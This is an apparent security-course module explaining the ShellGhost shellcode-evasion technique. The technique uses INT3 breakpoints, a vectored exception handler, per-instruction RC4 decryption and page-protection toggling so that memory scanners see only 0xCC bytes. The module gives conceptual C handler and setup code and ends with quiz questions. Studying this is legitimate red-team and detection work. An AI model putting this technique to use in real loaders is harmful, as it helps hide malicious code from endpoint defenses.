Difficulty: Intermediate

Module 4: The ShellGhost Concept

The complete single-instruction execution model — how INT3, VEH, shellcode mapping, SystemFunction032, and RW/RX toggling combine into invisible shellcode.

Module Objective

This module ties together the foundational concepts (INT3 breakpoints, VEH handlers, CONTEXT usage, and per-instruction encryption) into the complete ShellGhost execution model. You will understand the full cycle: how each shellcode instruction is replaced with 0xCC, how a Python preprocessing script maps each instruction for independent encryption, and how the VEH handler re-encrypts the previous instruction and decrypts the current one on each breakpoint — all within a single EXCEPTION_BREAKPOINT handler. This is the conceptual core of lem0nSec's ShellGhost technique.

1. The One-Exception Cycle

ShellGhost's execution revolves around a one-exception cycle that repeats for every instruction in the shellcode. Each iteration involves exactly one exception (EXCEPTION_BREAKPOINT) and one VEH handler invocation that performs both re-encryption of the previous instruction and decryption of the current one:

The ShellGhost One-Exception Cycle

CPU hits 0xCC
EXCEPTION_BREAKPOINT
VEH: Re-encrypt prev
Restore 0xCC
VEH: Decrypt current
SystemFunction032
Toggle RW→RX
VirtualProtect
Execute instruction
CPU runs decrypted code
Next 0xCC Hit
Cycle repeats
StepHandler ActionResult
Step 1EXCEPTION_BREAKPOINT fires. Handler re-encrypts the previously executed instruction bytes back to 0xCC (if any).Previous instruction is cleaned up
Step 2Handler looks up the current instruction in the CRYPT_BYTES_QUOTA array, decrypts it using SystemFunction032 (RC4), and writes the decrypted bytes to the execution buffer.Current instruction is ready for execution
Step 3Handler toggles the page from RW to RX via VirtualProtect and returns EXCEPTION_CONTINUE_EXECUTION.CPU resumes and executes the decrypted instruction, then hits the next 0xCC

2. Memory State at Each Phase

To make this concrete, let us trace the memory state through two iterations of the cycle. Assume the shellcode starts at address 0x1000. The first instruction is 0x48 0x89 0xE5 (mov rbp, rsp, 3 bytes) and the second is 0x48 0x83 0xEC 0x20 (sub rsp, 0x20, 4 bytes):

Step-by-Step Memory Trace

StepMemory at 0x1000-0x1002Memory at 0x1003-0x1006RIPEvent
InitialCC CC CCCC CC CC CC0x1000CPU encounters 0xCC, BREAKPOINT fires
After 1st BP handler48 89 E5CC CC CC CC0x1000Handler decrypts instruction 1, toggles to RX
After instruction 1 executes48 89 E5CC CC CC CC0x1003CPU executes mov rbp,rsp; hits next 0xCC, BREAKPOINT fires
After 2nd BP handlerCC CC CC48 83 EC 200x1003Handler re-encrypts instr 1, decrypts instr 2, toggles to RX

Important Nuance: Multi-Byte Instructions

x86/x64 instructions can be 1 to 15 bytes long. ShellGhost handles this through the shellcode mapping preprocessing step. The Python script (ShellGhost_mapping.py) disassembles the shellcode ahead of time and records each instruction's offset (RVA) and byte count (quota) in a CRYPT_BYTES_QUOTA struct. At runtime, the VEH handler uses this mapping to know exactly how many bytes to decrypt for the current instruction and how many bytes to re-encrypt from the previous one. There is no need to determine instruction boundaries at runtime.

3. The Handler Logic

ShellGhost's VEH handler performs all work within a single EXCEPTION_BREAKPOINT handler. Each invocation does both re-encryption and decryption:

C// Conceptual handler logic
LONG CALLBACK GhostHandler(PEXCEPTION_POINTERS ep) {
    DWORD code = ep->ExceptionRecord->ExceptionCode;
    PCONTEXT ctx = ep->ContextRecord;

    if (code == EXCEPTION_BREAKPOINT) {
        // Rip already points to the 0xCC (kernel adjusted it)
        PBYTE current = (PBYTE)ctx->Rip;

        // Validate: is this in our execution buffer?
        if (!IsInExecBuffer(current))
            return EXCEPTION_CONTINUE_SEARCH;

        // Step 1: Re-encrypt the PREVIOUS instruction (if any)
        //   - Toggle to RW via VirtualProtect
        //   - Write 0xCC back over previous instruction bytes
        if (g_ctx.prev_index >= 0) {
            ReEncryptPrevious();
        }

        // Step 2: Decrypt the CURRENT instruction
        //   - Look up CRYPT_BYTES_QUOTA for current instruction index
        //   - Use SystemFunction032 to decrypt instruction bytes
        //   - Write decrypted bytes to execution buffer
        DecryptCurrent(g_ctx.current_index);

        // Step 3: Toggle memory to RX for execution
        VirtualProtect(page, size, PAGE_EXECUTE_READ, &old);

        // Step 4: Advance instruction index
        g_ctx.prev_index = g_ctx.current_index;
        g_ctx.current_index++;

        return EXCEPTION_CONTINUE_EXECUTION;
    }

    // Not our exception
    return EXCEPTION_CONTINUE_SEARCH;
}

4. The Data Structures

ShellGhost needs to maintain several pieces of state across handler invocations. These are typically stored in global variables accessible to the VEH handler:

C// Key data structure: per-instruction encryption mapping
// Generated by ShellGhost_mapping.py preprocessing script
typedef struct _CRYPT_BYTES_QUOTA {
    DWORD rva;      // Offset of this instruction within the shellcode
    DWORD quota;    // Number of bytes in this instruction
} CRYPT_BYTES_QUOTA;

// Example: first 3 instructions mapped by the preprocessing script
// CRYPT_BYTES_QUOTA map[] = {
//     { 0x0000, 3 },  // mov rbp, rsp      (3 bytes at offset 0)
//     { 0x0003, 4 },  // sub rsp, 0x20     (4 bytes at offset 3)
//     { 0x0007, 2 },  // xor ecx, ecx      (2 bytes at offset 7)
//     ...
// };

// Global state for the ShellGhost handler
typedef struct _GHOST_CONTEXT {
    LPVOID  exec_buffer;       // Base address of the 0xCC-filled RW region
    SIZE_T  exec_size;         // Size of the execution buffer
    PBYTE   encrypted_sc;      // Per-instruction encrypted shellcode bytes
    SIZE_T  sc_size;           // Size of the shellcode

    // Instruction mapping (from preprocessing)
    CRYPT_BYTES_QUOTA *map;    // Array of per-instruction RVA + byte count
    DWORD   num_instructions;  // Total number of mapped instructions
    DWORD   current_index;     // Index of current instruction being executed

    // RC4 key for SystemFunction032
    BYTE    rc4_key[16];       // RC4 encryption key
    SIZE_T  key_len;           // Key length

    // Tracking state
    INT     prev_index;        // Index of previously executed instruction (-1 if none)
} GHOST_CONTEXT;

static GHOST_CONTEXT g_ghost = { 0 };

Why Global State?

VEH handlers receive only the EXCEPTION_POINTERS parameter — there is no way to pass custom context. Therefore, ShellGhost stores its state in global (or static) variables. This is safe because the execution buffer is only used by a single thread. If multi-threaded execution were needed, the state would need thread-local storage or synchronization.

5. Setup and Initialization

Before the execution cycle begins, ShellGhost performs these initialization steps:

C// Note: In real ShellGhost, the preprocessing is done OFFLINE
// by ShellGhost_mapping.py. The encrypted data and CRYPT_BYTES_QUOTA
// arrays are compiled directly into the C source as static arrays.

void ShellGhostInit(
    PBYTE encrypted_sc,            // Pre-encrypted shellcode (from mapping.py)
    SIZE_T sc_size,
    CRYPT_BYTES_QUOTA *map,        // Instruction map (from mapping.py)
    DWORD num_instructions,
    PBYTE key, SIZE_T key_size
) {
    // Step 1: Store encrypted data and mapping references
    g_ghost.encrypted_sc = encrypted_sc;
    g_ghost.sc_size = sc_size;
    g_ghost.map = map;
    g_ghost.num_instructions = num_instructions;
    memcpy(g_ghost.rc4_key, key, key_size);
    g_ghost.key_len = key_size;
    g_ghost.prev_index = -1;
    g_ghost.current_index = 0;

    // Step 2: Allocate execution buffer filled with 0xCC (RW, not RWX)
    g_ghost.exec_buffer = VirtualAlloc(NULL, sc_size,
        MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    memset(g_ghost.exec_buffer, 0xCC, sc_size);
    g_ghost.exec_size = sc_size;

    // Step 3: Register VEH handler
    AddVectoredExceptionHandler(1, GhostHandler);

    // Step 4: Create thread at end of .text segment
    // ResolveEndofTextSegment() finds null bytes to use as entry
    LPVOID entry = ResolveEndofTextSegment();
    HANDLE hThread = CreateThread(NULL, 0,
        (LPTHREAD_START_ROUTINE)entry, NULL, 0, NULL);
    WaitForSingleObject(hThread, INFINITE);
}

6. Address Validation

A critical part of the handler is verifying that the exception originated from within the execution buffer. Without this check, the handler would incorrectly process breakpoints from other sources (debugger breakpoints, other code using INT3, etc.):

C// Check if the address is within our execution buffer
BOOL IsInExecBuffer(PVOID addr) {
    return (addr >= g_ghost.exec_buffer) &&
           (addr < (PBYTE)g_ghost.exec_buffer + g_ghost.exec_size);
}

LONG CALLBACK GhostHandler(PEXCEPTION_POINTERS ep) {
    PCONTEXT ctx = ep->ContextRecord;

    if (ep->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT) {
        // For breakpoint: the kernel (KiDispatchException) already
        // decremented RIP by 1, so ContextRecord->Rip points directly
        // at the 0xCC byte. No manual adjustment needed.
        PVOID cc_addr = (PVOID)ctx->Rip;

        if (!IsInExecBuffer(cc_addr)) {
            return EXCEPTION_CONTINUE_SEARCH;  // Not ours
        }
        // ... handle our breakpoint
    }
    // ...
}

7. The Complete Conceptual Flow

Here is the entire ShellGhost execution flow from start to finish:

Preprocessing Phase (Offline)

  1. ShellGhost_mapping.py disassembles the raw shellcode using a disassembler (e.g., Capstone)
  2. Each instruction's offset (RVA) and byte count (quota) are recorded into CRYPT_BYTES_QUOTA structs
  3. Each instruction is encrypted independently with RC4 using SystemFunction032
  4. The encrypted data and mapping arrays are output as C source code to be compiled into the binary

Initialization Phase (Runtime)

  1. Load the pre-encrypted shellcode data and instruction map (compiled into the binary)
  2. Allocate a PAGE_READWRITE region and fill it entirely with 0xCC
  3. Register the VEH handler with First = 1
  4. Create a new thread via CreateThread() with entry at the end of the .text segment

Execution Cycle (repeats per instruction)

  1. CPU hits 0xCC at current position → EXCEPTION_BREAKPOINT fires
  2. VEH handler: ContextRecord->Rip already points at the 0xCC (kernel adjusted it)
  3. VEH handler: toggle page to RW via VirtualProtect
  4. VEH handler: re-encrypt the previously executed instruction back to 0xCC (if any)
  5. VEH handler: look up CRYPT_BYTES_QUOTA for current instruction index to get RVA and byte count
  6. VEH handler: call SystemFunction032 to decrypt the instruction bytes at that offset
  7. VEH handler: write the decrypted bytes to the execution buffer
  8. VEH handler: toggle page to RX via VirtualProtect and return EXCEPTION_CONTINUE_EXECUTION
  9. CPU executes the decrypted instruction, then encounters the next 0xCC → cycle repeats from step 1

Termination

When the shellcode executes a ret instruction or otherwise transfers control outside the execution buffer, the next exception (if any) will not pass the address validation check, and normal execution resumes. If the shellcode calls Windows APIs, those calls execute normally without triggering breakpoints (the APIs live outside the execution buffer).

8. What a Memory Scanner Sees

At any point during execution, a memory scanner examining the execution buffer sees:

TextExecution buffer during ShellGhost operation:

Address     Content    Meaning
0x1000      CC         INT3 (already executed and re-encrypted)
0x1001      CC         INT3 (already executed and re-encrypted)
0x1002      CC         INT3 (already executed and re-encrypted)
0x1003      48         Decrypted instruction (currently executing)
0x1004      83         (part of current instruction)
0x1005      EC         (part of current instruction)
0x1006      20         (part of current instruction)
0x1007      CC         INT3 (not yet reached)
...         CC         INT3 (all remaining bytes)

At MOST one instruction is decrypted (~1-15 bytes).
Every other byte is 0xCC.
No shellcode signature. No recognizable pattern. No entropy anomaly.

The "Ghost" Effect

This is why the tool is called ShellGhost. The shellcode is like a ghost — it is there, executing and producing effects, but you cannot observe it. A memory scan shows nothing. A memory dump shows nothing. The shellcode materializes one instruction at a time, executes, and vanishes back into a sea of 0xCC bytes.

Knowledge Check

Q1: How many exceptions does ShellGhost generate per shellcode instruction?

A) One (EXCEPTION_BREAKPOINT only)
B) Two (EXCEPTION_BREAKPOINT then EXCEPTION_SINGLE_STEP)
C) Three (breakpoint, single-step, and access violation)
D) It varies depending on instruction length

Q2: Why must the VEH handler check if the exception address is within the execution buffer?

A) To prevent stack overflow from recursive exceptions
B) To handle multi-threaded shellcode execution
C) To avoid processing breakpoints from other sources (debuggers, other code)
D) To ensure the buffer has not been freed

Q3: What does the execution buffer contain when a memory scanner reads it during ShellGhost execution?

A) Almost entirely 0xCC bytes, with at most one decrypted instruction
B) The fully decrypted shellcode
C) RC4-encrypted ciphertext
D) Random data with high entropy